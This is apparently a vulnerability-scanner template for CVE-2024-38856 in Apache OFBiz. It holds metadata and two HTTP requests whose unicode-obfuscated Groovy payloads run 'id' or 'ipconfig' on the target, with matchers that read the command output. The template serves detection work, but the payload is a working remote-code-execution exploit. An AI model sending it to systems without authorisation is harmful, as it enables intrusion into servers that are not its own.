id: CVE-2024-38856

info:
  name: Apache OFBiz - Improper Authorization & Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Improper Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    An attacker can exploit this directory traversal vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data.
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    cve-id: CVE-2024-38856
    cvss-score: 9.8
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    epss-score: 0.94375
    epss-percentile: 0.99968
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Apache_OFBiz"
    shodan-query: 'title:"OFBiz"'
    product: ofbiz
    vendor: apache
  tags: cve,cve2024,apache,ofbiz,rce,kev,vkev,vuln

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0070\u0063\u006f\u006e\u0066\u0069\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
        condition: or

      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022016e0da50c488291b61b50da33d4a766c95447ea7cfc2cf3e36ca248fddcffe72022100aa626ea061c6dd4e622d92d5019a3025930cc898b342211734905b350c2fc28e:922c64590222798bb761d5b6d8e72950